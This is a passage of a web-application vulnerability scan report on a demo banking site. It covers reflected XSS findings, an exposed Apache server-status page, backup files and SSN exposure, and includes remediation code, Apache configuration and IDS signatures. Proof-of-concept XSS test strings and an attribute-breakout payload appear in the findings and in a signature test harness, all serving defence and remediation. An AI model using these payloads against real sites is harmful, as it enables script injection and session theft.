different type of error for a file that does not exist as opposed to a file that does? Are phrases like "Permission Denied" utilized
which could reveal the existence of a file to an attacker?

Reference
HP:
HP Application Security Center SQL Injection Whitepaper
Apache:
Apache HTTP Server Version 1.3 Custom Error Responses
Apache HTTP Server Version 2.0 Custom Error Responses
Microsoft:
Description of Microsoft Internet Information Services (IIS) 5.0 and 6.0 status codes

Classifications

CWE-388: Error Handling


http://cwe.mitre.org/data/definitions/388.html
CWE-497: Exposure of System Data to an Unauthorized Control Sphere
http://cwe.mitre.org/data/definitions/497.html
CWE-200: Information Exposure
http://cwe.mitre.org/data/definitions/200.html
Kingdom: Errors
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Cross-Site Scripting: Reflected ( 5649 )


Summary

Cross-Site Scripting vulnerability found in GET parameter question. The following attack uses plain encoding:
<sCrIpT>alert(74867)</sCrIpT>

Cross-Site Scripting vulnerabilities were verified as executing code on the web application. Cross-Site Scripting occurs when
dynamically generated web pages display user input, such as login information, that is not properly validated, allowing an
attacker to embed malicious scripts into the generated page and then execute the script on the machine of any user that
views the site. In this instance, the web application was vulnerable to an automatic payload, meaning the user simply has to
visit a page to make the malicious scripts execute. If successful, Cross-Site Scripting vulnerabilities can be exploited to
manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential
information, or execute malicious code on end user systems. Recommendations include implementing secure programming
techniques that ensure proper filtering of user-supplied data, and encoding all user-supplied data to prevent inserted scripts
from being sent to end users in a format that can be executed.

Execution
View the attack string included with the request to check what to search for in the response. For instance, if "javascript:alert
('XSS')" (or a payload in another scripting language) is submitted as an attack, it will also appear as part of the response. This
indicates that the web application is taking values from the HTTP request parameters and using them in the HTTP response
without first removing or encoding potentially malicious data.

Implication
XSS can generally be subdivided into two categories: stored and reflected attacks. The main difference between the two is in
how the payload arrives at the server. Stored attacks are just that...in some form stored on the target server, such as in a
database, or via a submission to a bulletin board or visitor log. The victim will retrieve and execute the attack code in his
browser when a request is made for the stored information. Reflected attacks, on the other hand, come from somewhere else.
This happens when user input from a web client is immediately included via server-side scripts in a dynamically generated
web page. Via some social engineering, an attacker can trick a victim, such as through a malicious link or "rigged" form, to
submit information which will be altered to include attack code and then sent to the legitimate server. The injected code is
then reflected back to the user's browser which executes it because it came from a trusted server. The implication of each
kind of attack is the same.
The main problems associated with successful Cross-Site Scripting attacks are:
Account hijacking - An attacker can hijack the user's session before the session cookie expires and take actions with the
privileges of the user who accessed the URL, such as issuing database queries and viewing the results.
Malicious script execution - Users can unknowingly execute JavaScript, VBScript, ActiveX, HTML, or even Flash content
that has been inserted into a dynamically generated page by an attacker.
Worm propagation - With Ajax applications, XSS can propagate somewhat like a virus. The XSS payload can
autonomously inject itself into pages, and easily re-inject the same host with more XSS, all of which can be done with no
hard refresh. Thus, XSS can send multiple requests using complex HTTP methods to propagate itself invisibly to the user.
Information theft - Via redirection and fake sites, attackers can connect users to a malicious server of the attacker's
choice and capture any information entered by the user.
Denial of Service - Often by utilizing malformed display requests on sites that contain a Cross-Site Scripting vulnerability,
attackers can cause a denial of service condition to occur by causing the host site to query itself repeatedly.
Browser Redirection - On certain types of sites that use frames, a user can be made to think that he is in fact on the
original site when he has been redirected to a malicious one, since the URL in the browser's address bar will remain the
same. This is because the entire page isn't being redirected, just the frame in which the JavaScript is being executed.
Manipulation of user settings - Attackers can change user settings for nefarious purposes.
For more detailed information on Cross-Site Scripting attacks, see the HP Cross-Site Scripting whitepaper.

Fix
For Development:
Cross-Site Scripting attacks can be avoided by carefully validating all input, and properly encoding all output. When validating
user input, verify that it matches the strictest definition of valid input possible. For example, if a certain parameter is supposed
to be a number, attempt to convert it to a numeric data type in your programming language.
PHP: intval("0".$_GET['q']);
ASP.NET: int.TryParse(Request.QueryString["q"], out val);
The same applies to date and time values, or anything that can be converted to a stricter type before being used. When
accepting other types of text input, make sure the value matches either a list of acceptable values (white-listing), or a strict
regular expression. If at any point the value appears invalid, do not accept it. Also, do not attempt to return the value to the
user in an error message.
Most server-side scripting languages provide built-in methods to convert the value of the input variable into correct, non-interpretable HTML. These should be used to encode all input before it is displayed to the client.
PHP: string htmlspecialchars (string string [, int quote_style]) (pass ENT_QUOTES so that single quotes are encoded as well; the older default flags leave them untouched)
ASP.NET: Server.HtmlEncode (string)
When reflecting values into JavaScript or another format, make sure to use a type of encoding that is appropriate. Encoding
data for HTML is not sufficient when it is reflected inside of a script or style sheet. For example, when reflecting data in a
JavaScript string, make sure to encode all non-alphanumeric characters using hex (\xHH) encoding.
If you have JavaScript on your page that accesses unsafe information (like location.href) and writes it to the page (either with
document.write, or by modifying a DOM element), make sure you encode data for HTML before writing it to the page.
JavaScript does not have a built-in function to do this, but many frameworks do. If you are lacking an available function,
something like the following will handle most cases (every pattern needs the /g flag; a pattern with only /i replaces the first
occurrence and leaves any later < in the value unencoded; &#39; is used for the apostrophe because &apos; is not defined in HTML 4):
s = s.replace(/&/g,'&amp;').replace(/"/g,'&quot;').replace(/</g,'&lt;').replace(/>/g,'&gt;').replace(/'/g,'&#39;')
Ensure that you are always using the right approach at the right time. Validating user input should be done as soon as it is
received. Encoding data for display should be done immediately before displaying it.
For Security Operations:
Report Date: 10/10/2016

100

Server-side encoding, where all dynamic content is first sent through an encoding function where Scripting tags will be
replaced with codes in the selected character set, can help to prevent Cross-Site Scripting attacks.
Many web application platforms and frameworks have some built-in support for preventing Cross-Site Scripting. Make sure
that any built-in protection is enabled for your platform. In some cases, a misconfiguration could allow Cross-Site Scripting. In
ASP.NET, if a page's EnableViewStateMac property is set to False, the ASP.NET view state can be used as a vector for Cross-Site Scripting.
An IDS or IPS can also be used to detect or filter out XSS attacks. Below are a few regular expressions that will help detect
Cross-Site Scripting.
Regex for a simple XSS attack:
/((\%3C)|<)((\%2F)|\/)*[a-z0-9\%]+((\%3E)|>)/ix
This matches an opening angle bracket (literal or URL-encoded as %3C), an optional slash, a tag name and a closing bracket, so it
catches <script> and </script> but not a tag that carries attributes, such as <img src=x onerror=...>, where a space follows the tag name.
The above regular expression would be added into a new Snort rule as follows:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"NII Cross-Site Scripting attempt"; flow:to_server,established; pcre:"/((\%3C)|<)((\%2F)|\/)*[a-z0-9\%]+((\%3E)|>)/i"; classtype:web-application-attack; sid:9000; rev:5;)
Paranoid regex for XSS attacks:
/((\%3C)|<)[^\n]+((\%3E)|>)/i
This signature simply looks for the opening HTML tag, or its hex equivalent, followed by one or more characters other than a
newline, and then the closing tag or its hex equivalent. It will produce false positives on any request that legitimately contains
both brackets, and it catches only payloads that contain an angle bracket: an injection into an existing attribute value, such as
" onmouseover=alert(1) x=", contains neither and passes both signatures. Treat these rules as a detection aid, not as a substitute
for fixing the application.
For QA:
Fixes for Cross-Site Scripting defects will ultimately require code based fixes. Read the following links for more information
about manually testing your application for Cross-Site Scripting.

Reference
OWASP Cross-Site Scripting Information
https://www.owasp.org/index.php/XSS
Microsoft
http://support.microsoft.com/default.aspx?scid=kb;EN-US;q252985
Microsoft Anti-Cross Site Scripting Library
https://msdn.microsoft.com/en-us/security/aa973814.aspx
CERT
http://www.cert.org/advisories/CA-2000-02.html
Apache
http://httpd.apache.org/info/css-security/apache_specific.html
SecurityFocus.com
http://www.securityfocus.com/infocus/1768

Classifications

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
http://cwe.mitre.org/data/definitions/79.html
CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
http://cwe.mitre.org/data/definitions/80.html
CWE-82: Improper Neutralization of Script in Attributes of IMG Tags in a Web Page
http://cwe.mitre.org/data/definitions/82.html
CWE-83: Improper Neutralization of Script in Attributes in a Web Page
http://cwe.mitre.org/data/definitions/83.html
CWE-87: Improper Neutralization of Alternate XSS Syntax
http://cwe.mitre.org/data/definitions/87.html
CWE-116: Improper Encoding or Escaping of Output
http://cwe.mitre.org/data/definitions/116.html
CWE-692: Incomplete Blacklist to Cross-Site Scripting
http://cwe.mitre.org/data/definitions/692.html
CWE-811: OWASP Top Ten 2010 Category A2 - Cross-Site Scripting (XSS)
http://cwe.mitre.org/data/definitions/811.html
Kingdom: Input Validation and Representation
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Cross-Site Scripting: Reflected ( 5650 )


Summary

Cross-Site Scripting vulnerability found in the POST parameter 'name'. Triggering this vulnerability requires user action. The
following attack uses plain encoding:
<a HrEf=JaVaScRiPt:alert(87287)>
Cross-Site Scripting occurs when dynamically generated web pages display user input, such as login information, that is not
properly validated, allowing an attacker to embed malicious scripts into the generated page and then execute the script on the
machine of any user that views the site. User interaction vulnerabilities such as this one require the user to trigger the
execution of the malicious scripts via an action such as clicking a link or moving the mouse pointer over text. If successful,
Cross-Site Scripting vulnerabilities can be exploited to manipulate or steal cookies, create requests that can be mistaken for
those of a valid user, compromise confidential information, or execute malicious code on end user systems. Recommendations
include implementing secure programming techniques that ensure proper filtration of user-supplied data, and encoding all
user supplied data to prevent inserted scripts being sent to end users in a format that can be executed.

Execution
View the attack string included with the request to check what to search for in the response. For instance, if "javascript:alert('XSS')"
is submitted as an attack, it will also appear as part of the response. This indicates that the web application is taking
values from the HTTP request parameters and using them in the HTTP response without first encoding or removing potentially
malicious data.

Implication
XSS can generally be subdivided into two categories: stored and reflected attacks. The main difference between the two is in
how the payload arrives at the server. Stored attacks are just that...in some form stored on the target server, such as in a
database, or via a submission to a bulletin board or visitor log. The victim will retrieve and execute the attack code in his
browser when a request is made for the stored information. Reflected attacks, on the other hand, come from somewhere else.
This happens when user input from a web client is immediately included via server-side scripts in a dynamically generated
web page. Via some social engineering, an attacker can trick a victim, such as through a malicious link or "rigged" form, to
submit information which will be altered to include attack code and then sent to the legitimate server. The injected code is
then reflected back to the user's browser which executes it because it came from a trusted server. The implication of each
kind of attack is the same.
The main problems associated with successful Cross-Site Scripting attacks are:
Account hijacking - An attacker can hijack the user's session before the session cookie expires and take actions with the
privileges of the user who accessed the URL, such as issuing database queries and viewing the results.
Malicious script execution - Users can unknowingly execute JavaScript, VBScript, ActiveX, HTML, or even Flash content
that has been inserted into a dynamically generated page by an attacker.
Worm propagation - With Ajax applications, XSS can propagate somewhat like a virus. The XSS payload can
autonomously inject itself into pages, and easily re-inject the same host with more XSS, all of which can be done with no
hard refresh. Thus, XSS can send multiple requests using complex HTTP methods to propagate itself invisibly to the user.
Information theft - Via redirection and fake sites, attackers can connect users to a malicious server of the attacker's
choice and capture any information entered by the user.
Denial of Service - Often by utilizing malformed display requests on sites that contain a Cross-Site Scripting vulnerability,
attackers can cause a denial of service condition to occur by causing the host site to query itself repeatedly.
Browser Redirection - On certain types of sites that use frames, a user can be made to think that he is in fact on the
original site when he has been redirected to a malicious one, since the URL in the browser's address bar will remain the
same. This is because the entire page isn't being redirected, just the frame in which the JavaScript is being executed.
Manipulation of user settings - Attackers can change user settings for nefarious purposes.
For more detailed information on Cross-Site Scripting attacks, see the HP Cross-Site Scripting whitepaper.

Fix
For Development:
Cross-Site Scripting attacks can be avoided by carefully validating all input, and properly encoding all output. When validating
user input, verify that it matches the strictest definition of valid input possible. For example, if a certain parameter is supposed
to be a number, attempt to convert it to a numeric data type in your programming language.
PHP: intval("0".$_GET['q']);
ASP.NET: int.TryParse(Request.QueryString["q"], out val);
The same applies to date and time values, or anything that can be converted to a stricter type before being used. When
accepting other types of text input, make sure the value matches either a list of acceptable values (white-listing), or a strict
regular expression. If at any point the value appears invalid, do not accept it. Also, do not attempt to return the value to the
user in an error message.
Most server-side scripting languages provide built-in methods to convert the value of the input variable into correct, non-interpretable HTML. These should be used to encode all untrusted data at the point where it is written into the page:
PHP: string htmlspecialchars (string string [, int quote_style])
ASP.NET: Server.HTMLEncode (strHTML String)
When reflecting values into JavaScript or another format, make sure to use a type of encoding that is appropriate. Encoding
data for HTML is not sufficient when it is reflected inside of a script or style sheet. For example, when reflecting data in a
JavaScript string, make sure to encode all non-alphanumeric characters using hex (\xHH) encoding.
If you have JavaScript on your page that accesses unsafe information (like location.href) and writes it to the page (either with
document.write, or by modifying a DOM element), make sure you encode data for HTML before writing it to the page.
JavaScript does not have a built-in function to do this, but many frameworks do. If you are lacking an available function,
something like the following will handle most cases (every pattern needs the /g flag; a pattern with only /i replaces the first
occurrence and leaves any later < in the value unencoded; &#39; is used for the apostrophe because &apos; is not defined in HTML 4):
s = s.replace(/&/g,'&amp;').replace(/"/g,'&quot;').replace(/</g,'&lt;').replace(/>/g,'&gt;').replace(/'/g,'&#39;')
Ensure that you are always using the right approach at the right time. Validating user input should be done as soon as it is
received. Encoding data for display should be done immediately before displaying it.
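The Fix sections for both XSS findings above distinguish an HTML context from a JavaScript-string context. The following is an added example, not code from the report, from HP or from the target site, that implements both encoders in JavaScript and shows the difference the /g flag makes. The greeting template and the use of this finding's attack string as input are constructed for illustration.

```javascript
// Added example (not from the WebInspect report or the target site):
// context-aware output encoding for the two sinks the Fix section
// distinguishes, an HTML text/attribute context and a JavaScript string
// literal inside <script>.

// HTML context: entity-encode the five characters that can change HTML
// structure. '&' goes first so already-encoded output is not re-encoded.
// The /g flag matters: without it only the first occurrence is rewritten.
function encodeForHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Same one-liner with /i instead of /g: only the first '<', '>', '"' and
// "'" are encoded and every later one reaches the page intact. Kept only
// to show the difference; do not use it.
function encodeForHtmlFirstOnly(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/i, '&quot;')
    .replace(/</i, '&lt;')
    .replace(/>/i, '&gt;')
    .replace(/'/i, '&apos;');
}

// JavaScript string context: the HTML parser does not decode entities
// inside <script>, so entity encoding does nothing there, and a quote or
// '</script>' in the data would end the literal or the whole element.
// Hex-escape every UTF-16 unit outside [A-Za-z0-9] (\xHH below 0x100,
// \uHHHH above), which leaves the value unable to be anything but a string.
function encodeForJsString(s) {
  const str = String(s);
  let out = '';
  for (let i = 0; i < str.length; i++) {
    const code = str.charCodeAt(i);           // always < 0x10000
    if (/[A-Za-z0-9]/.test(str[i])) {
      out += str[i];
    } else if (code < 0x100) {
      out += '\\x' + code.toString(16).toUpperCase().padStart(2, '0');
    } else {
      out += '\\u' + code.toString(16).toUpperCase().padStart(4, '0');
    }
  }
  return out;
}

// Constructed template: a page that greets the user by the reflected
// 'name' parameter and also hands it to client-side script, i.e. the same
// value lands in both contexts and needs a different encoder in each.
function renderGreeting(name) {
  return '<p>Hello, ' + encodeForHtml(name) + '</p>\n' +
         '<script>var user = "' + encodeForJsString(name) + '";</script>';
}

// The attack string the scanner submitted for this finding.
const ATTACK_STRING = '<a HrEf=JaVaScRiPt:alert(87287)>';

console.log(renderGreeting(ATTACK_STRING));
console.log('first-occurrence-only encoder leaves:', encodeForHtmlFirstOnly('<b>x</b>'));
```

The JS-string encoder is deliberately broader than a quote-escaper, so the same output is safe inside single- and double-quoted literals; a value that lands in a URL, CSS or event-handler attribute context still needs its own encoder, as the text above says.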
For Security Operations:
Server-side encoding, where all dynamic content is first sent through an encoding function where Scripting tags will be
replaced with codes in the selected character set, can help to prevent Cross-Site Scripting attacks.
Many web application platforms and frameworks have some built-in support for preventing Cross-Site Scripting. Make sure
that any built-in protection is enabled for your platform. In some cases, a misconfiguration could allow Cross-Site Scripting. In
ASP.NET, if a page's EnableViewStateMac property is set to False, the ASP.NET view state can be used as a vector for Cross-Site Scripting.
An IDS or IPS can also be used to detect or filter out XSS attacks. Below are a few regular expressions that will help detect
Cross-Site Scripting.
Regex for a simple XSS attack:
/((\%3C)|<)((\%2F)|\/)*[a-z0-9\%]+((\%3E)|>)/ix
This matches an opening angle bracket (literal or URL-encoded as %3C), an optional slash, a tag name and a closing bracket, so it
catches <script> and </script> but not a tag that carries attributes, such as <img src=x onerror=...>, where a space follows the tag name.
The above regular expression would be added into a new Snort rule as follows:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"NII Cross-Site Scripting attempt"; flow:to_server,established; pcre:"/((\%3C)|<)((\%2F)|\/)*[a-z0-9\%]+((\%3E)|>)/i"; classtype:web-application-attack; sid:9000; rev:5;)
Paranoid regex for XSS attacks:
/((\%3C)|<)[^\n]+((\%3E)|>)/i
This signature simply looks for the opening HTML tag, or its hex equivalent, followed by one or more characters other than a
newline, and then the closing tag or its hex equivalent. It will produce false positives on any request that legitimately contains
both brackets, and it catches only payloads that contain an angle bracket: an injection into an existing attribute value, such as
" onmouseover=alert(1) x=", contains neither and passes both signatures. Treat these rules as a detection aid, not as a substitute
for fixing the application.
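Added example, not from the report, the Snort project or the SecurityFocus article the rules come from: the two signatures above, with their alternation bars restored, run over a handful of constructed request lines in JavaScript, which reads the same pattern syntax minus the /x flag. It serves the Security Operations section of this finding and the identical one for the earlier XSS finding, and shows which payloads each signature catches and misses.

```javascript
// Added example, not from the report: the two IDS signatures above, with
// their alternation bars restored, evaluated in JavaScript over
// constructed request lines.

// "Simple" signature: bracket, optional slash, tag name, bracket. The tag
// name must be followed immediately by the closing bracket.
const SIMPLE_XSS = /((%3C)|<)((%2F)|\/)*[a-z0-9%]+((%3E)|>)/i;

// "Paranoid" signature: opening bracket, anything but a newline, closing
// bracket. Catches tags with attributes, at the price of false positives.
const PARANOID_XSS = /((%3C)|<)[^\n]+((%3E)|>)/i;

// Constructed request lines (decoded form bodies shown inline), chosen to
// cover each behaviour: a benign search, a bare tag, its URL-encoded twin,
// the finding's own attack string, an attribute-breakout payload with no
// brackets, and a benign request that happens to contain both brackets.
const SAMPLE_REQUESTS = [
  'GET /search.html?searchTerm=hello+world HTTP/1.1',
  'GET /search.html?searchTerm=<script>alert(1)</script> HTTP/1.1',
  'GET /search.html?searchTerm=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1',
  'POST /login.html  name=<a HrEf=JaVaScRiPt:alert(87287)>&email=x@example.com',
  'GET /search.html?searchTerm=" onmouseover=alert(1) x=" HTTP/1.1',
  'GET /compare.html?a=x<y&b=y>z HTTP/1.1',
];

// Run both signatures over one line. RegExp.test on a non-global pattern
// is stateless, so the shared constants are safe to reuse.
function classify(line) {
  return { line, simple: SIMPLE_XSS.test(line), paranoid: PARANOID_XSS.test(line) };
}

function classifyAll(lines = SAMPLE_REQUESTS) {
  return lines.map(classify);
}

// S = simple signature fired, P = paranoid signature fired.
for (const r of classifyAll()) {
  console.log((r.simple ? 'S' : '-') + (r.paranoid ? 'P' : '-') + '  ' + r.line);
}
```

Read the two flag columns: the attack string WebInspect used for this finding defeats the simple signature because of the space after the tag name, the attribute breakout defeats both, and the benign compare request trips the paranoid one. Extending the rule set to match event-handler names and the javascript: scheme narrows the first two gaps at the cost of more false positives; the fix remains output encoding.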
For QA:
Fixes for Cross-Site Scripting defects will ultimately require code based fixes. Read the HP Cross-Site Scripting white paper for
more information about manually testing your application for Cross-Site Scripting.

Reference
OWASP Cross-Site Scripting Information:
https://www.owasp.org/index.php/XSS
Microsoft:
http://support.microsoft.com/default.aspx?scid=kb;EN-US;q252985
Microsoft Anti-Cross Site Scripting Library
https://msdn.microsoft.com/en-us/security/aa973814.aspx
CERT:
http://www.cert.org/advisories/CA-2000-02.html
Apache:
http://httpd.apache.org/info/css-security/apache_specific.html
SecurityFocus.com:
http://www.securityfocus.com/infocus/1768

Classifications

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
http://cwe.mitre.org/data/definitions/79.html
CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
http://cwe.mitre.org/data/definitions/80.html
CWE-82: Improper Neutralization of Script in Attributes of IMG Tags in a Web Page
http://cwe.mitre.org/data/definitions/82.html
CWE-83: Improper Neutralization of Script in Attributes in a Web Page
http://cwe.mitre.org/data/definitions/83.html
CWE-87: Improper Neutralization of Alternate XSS Syntax
http://cwe.mitre.org/data/definitions/87.html
CWE-116: Improper Encoding or Escaping of Output
http://cwe.mitre.org/data/definitions/116.html
CWE-692: Incomplete Blacklist to Cross-Site Scripting
http://cwe.mitre.org/data/definitions/692.html
CWE-811: OWASP Top Ten 2010 Category A2 - Cross-Site Scripting (XSS)
http://cwe.mitre.org/data/definitions/811.html
Kingdom: Input Validation and Representation
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Privacy Violation: Social Security Number ( 10834 )


Summary
A critical vulnerability has been detected within your web application due to the presence of one or more Social Security
Numbers. If this information is carried over to a production server, it can cause major security problems. Recommendations
include not storing this information on your web application.

Implication
Social Security Numbers are a highly sought-after prize for attackers, and one to which they will dedicate a large share of their
effort to find. At a minimum, their exposure can lead to theft of the victim's identity.

Fix
When sensitive data needs to be available on your web application, mask part of the data so this information is not fully
disclosed.
Here are a few examples:
Social Security Numbers:
***-**-1234
123-**-****
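Added example, not part of the report: a small detector and masker in JavaScript that a QA or operations team could run over HTTP response bodies to find full Social Security Numbers before a release and to apply the masking recommended above. The response fragment is constructed. The plausibility filter uses the Social Security Administration's never-issued ranges (area 000, 666 and 900-999; group 00; serial 0000) to reduce false positives; whether to redact implausible numbers anyway is a policy choice.

```javascript
// Added example, not part of the report: find and mask Social Security
// Numbers in an HTTP response body.

// Canonical nnn-nn-nnnn shape with word boundaries, so a longer digit run
// (an account or phone number) is not cut into a false match.
const SSN_RE = /\b(\d{3})-(\d{2})-(\d{4})\b/g;

// Structural plausibility per the Social Security Administration: area
// 000, 666 and 900-999 are never issued, group 00 and serial 0000 never
// occur. Filtering on these keeps placeholder and test values out.
function isPlausibleSsn(area, group, serial) {
  const a = Number(area);
  if (a === 0 || a === 666 || a >= 900) return false;
  if (Number(group) === 0) return false;
  if (Number(serial) === 0) return false;
  return true;
}

// All plausible SSNs in a body, in order of appearance.
function findSsns(text) {
  const found = [];
  for (const m of String(text).matchAll(SSN_RE)) {
    if (isPlausibleSsn(m[1], m[2], m[3])) found.push(m[0]);
  }
  return found;
}

// The masking form the Fix above recommends: keep only the last four.
function maskSsn(ssn) {
  return '***-**-' + ssn.slice(-4);
}

// Rewrite a body so every plausible SSN is masked; implausible matches are
// left alone (change the callback to mask them too if policy requires).
function redactSsns(text) {
  return String(text).replace(SSN_RE, (m, area, group, serial) =>
    isPlausibleSsn(area, group, serial) ? maskSsn(m) : m);
}

// Constructed response fragment covering the real and never-issued shapes.
const SAMPLE_RESPONSE = [
  '<tr><td>Account holder</td><td>J. Smith</td></tr>',
  '<tr><td>SSN</td><td>123-45-6789</td></tr>',              // plausible
  '<tr><td>Joint holder SSN</td><td>555-12-3456</td></tr>', // plausible
  '<tr><td>Reference</td><td>000-12-3456</td></tr>',        // area 000
  '<tr><td>Reference</td><td>666-01-0001</td></tr>',        // area 666
  '<tr><td>Reference</td><td>987-65-4320</td></tr>',        // area >= 900
  '<tr><td>Reference</td><td>555-00-1234</td></tr>',        // group 00
  '<tr><td>Reference</td><td>555-12-0000</td></tr>',        // serial 0000
  '<tr><td>Phone</td><td>555-123-4567</td></tr>',           // not the SSN shape
].join('\n');

console.log('found:', findSsns(SAMPLE_RESPONSE));
console.log(redactSsns(SAMPLE_RESPONSE));
```

Run this over captured responses from a test account and fail the build on any non-empty findSsns result; the same regex without the plausibility filter is what a scanner such as the one that raised this finding will match on, so a clean result here means a clean result there.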

Reference

Classifications

CWE-359: Privacy Violation
http://cwe.mitre.org/data/definitions/359.html
CWE-200: Information Exposure
http://cwe.mitre.org/data/definitions/200.html
Kingdom: Security Features
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Web Server Misconfiguration: Unprotected File ( 157 )


Summary
The Apache server status page (server-status) was found. This page contains detailed information about the current use of
your web server, including information about the current hosts and requests being processed. This vulnerability is caused by
default or incorrect configuration of the httpd.conf file. If exploited, an attacker could view the sensitive system information in
the file. Recommendations include editing the web server configuration file to prevent access to the server-status page.

Execution
To verify the exploit, browse to the following link: http://zero.webappsecurity.com:80/server-status

Implication
A basic requirement for a successful attack upon your web application is reconnaissance. An attacker will employ a variety of
methods, including malicious scanning agents and Google searches, to find out as much information about your web
application as possible. The attacker can then use that information to formulate the next method of attack. An attacker who
discovers sensitive system information has had a large portion of reconnaissance conducted for him or her.

Fix
For Security Operations:
For security reasons, you should restrict access to the server-status page in your web server configuration. To do this,
comment out the following lines in the httpd.conf file, or, if operations staff need the page, keep them and limit the Location
block to local and administrative addresses with a Require directive:
<Location /server-status>
SetHandler server-status
</Location>
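Added example, not from the report or the target site's configuration: the two ways to close this finding in httpd. The first removes the handler entirely, which is the fix stated above; the second, for sites where operations staff rely on the page, keeps it but limits it to the loopback address and a management network. The 10.0.0.0/8 range is an assumption; the directives are standard mod_status and mod_authz_core (Apache 2.4) syntax.

```apache
# Option 1 (the report's fix): no status handler at all. Comment out the
# Location block and stop loading mod_status.
#LoadModule status_module modules/mod_status.so
#<Location /server-status>
#    SetHandler server-status
#</Location>

# Option 2: keep the page for operations, but only from the loopback
# address and an assumed management network (Apache 2.4 mod_authz_core;
# several Require lines inside a Location are OR-ed together).
# ExtendedStatus Off stops the page from listing the URL of every
# request in flight, which is the most sensitive part of its output.
# The 10.0.0.0/8 range is a placeholder for your own management network.
ExtendedStatus Off
<Location "/server-status">
    SetHandler server-status
    Require local
    Require ip 10.0.0.0/8
</Location>
```

After apachectl configtest and a graceful reload, a request from outside the allowed ranges should return 403 instead of 200, and the Execution link above should no longer render the status page.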
For Development:
Unless you are actively involved with implementing the web application server, there is not a wide range of available solutions
to prevent problems that can occur from an attacker discovering sensitive system information about your application.
Primarily, this problem will be resolved by the web application server administrator or security operations. However, there are
certain actions you can take that will help to secure your web application and make it harder for an attacker to conduct a
successful attack.
Ensure that files containing sensitive information are not left publicly accessible, or that comments left inside files do not
reveal the locations of directories best left confidential.
Do not reveal information in pathnames that are publicly displayed. Do not include drive letters or directories outside of
the web document root in the pathname when a file must call another file on the web server. Use pathnames that are
relative to the current directory or the webroot.
Do not display error messages to the end user that provide information, such as directory names, that could be used in
orchestrating an attack.
Restrict access to important files or directories only to those who actually need it.
For QA:

This assessment performs the rote tasks of determining the directories and contents that are available via your web
application. For reasons of security, it is important to test the web application not only from the perspective of a normal user,
but also from that of a malicious one. Whenever possible, adopt the mindset of an attacker when testing your web application
for security defects. Access your web application from outside your firewall or IDS. Use Google or another search engine to
ensure that searches for vulnerable files or directories do not return information regarding your web application. For example,
an attacker will use a search engine, and search for directory listings such as 'index of / cgi-bin'. Make sure that your directory
structure is not obvious, and that only files that are necessary are capable of being accessed.

Reference
Apache Documentation
Configuration Files
Apache Module mod_status

Classifications

CWE-200: Information Exposure
http://cwe.mitre.org/data/definitions/200.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Web Server Misconfiguration: Unprotected File ( 708 )


Summary
WebInspect has detected a backup file with the .bak extension on the target server. The severity of the threat posed by a
web-accessible backup file depends on the sensitivity of the information stored in the original document. From such files an
attacker can gain sensitive information about the site architecture, database and network access credentials, encryption keys,
and so forth, and can use it to craft precise targeted attacks, which may not otherwise be feasible, against the application.

Execution
Browse to http://zero.webappsecurity.com:80/faq.html.bak and inspect the content. The response should return HTTP status
code 200 and should not match the target site's file-not-found response.

Implication
An attacker can use the information obtained from the backup file of a sensitive document to craft a precise targeted attack
against the web application. Such attacks can include, but are not limited to, SQL injection, remote file system access to
overwrite or inject malware, and database manipulation.

Fix
Webroot Security Policy: Implement a security policy that prohibits storage of backup files in webroot.
Temporary Files: Many tools and editors automatically create temporary files or backup files in the webroot. Be careful
when editing files on a production server to avoid inadvertently leaving a backup or temporary copy of the file(s) in the
webroot.
Default Installations: Often, a lot of unnecessary files and folders are installed by default. For instance, IIS installations
include demo applications. Be sure to remove any files or folders that are not required for application to work properly.

Development Backup: Source code backups should not be stored and left available in the webroot.

Further QA can include test cases to look for the presence of backup files in the webroot to ensure none are left in publicly
accessible folders of the web application.

Reference
OWASP - Review Old, Backup and Unreferenced Files for Sensitive Information (OTG-CONFIG-004)
CWE - 200 Information Exposure

Classifications

CWE-200: Information Exposure
http://cwe.mitre.org/data/definitions/200.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Web Server Misconfiguration: Unprotected File ( 709 )


Summary
WebInspect has detected a backup file with the .old extension on the target server. The severity of the threat posed by a
web-accessible backup file depends on the sensitivity of the information stored in the original document. From such files an
attacker can gain sensitive information about the site architecture, database and network access credentials, encryption keys,
and so forth, and can use it to craft precise targeted attacks, which may not otherwise be feasible, against the application.

Execution
Browse to http://zero.webappsecurity.com:80/index.html.old and inspect the content. The response should return HTTP status
code 200 and should not match the target site's file-not-found response.

Implication
An attacker can use the information obtained from the backup file of a sensitive document to craft a precise targeted attack
against the web application. Such attacks can include, but are not limited to, SQL injection, remote file system access to
overwrite or inject malware, and database manipulation.

Fix
Webroot Security Policy: Implement a security policy that prohibits storage of backup files in webroot.
Temporary Files: Many tools and editors automatically create temporary files or backup files in the webroot. Be careful
when editing files on a production server to avoid inadvertently leaving a backup or temporary copy of the file(s) in the
webroot.
Default Installations: Often, a lot of unnecessary files and folders are installed by default. For instance, IIS installations
include demo applications. Be sure to remove any files or folders that are not required for application to work properly.
Development Backup: Source code backups should not be stored and left available in the webroot.

Further QA can include test cases to look for the presence of backup files in the webroot to ensure none are left in publicly
accessible folders of the web application.

Reference
OWASP - Review Old, Backup and Unreferenced Files for Sensitive Information (OTG-CONFIG-004)
CWE - 200 Information Exposure

Classifications

CWE-200: Information Exposure
http://cwe.mitre.org/data/definitions/200.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

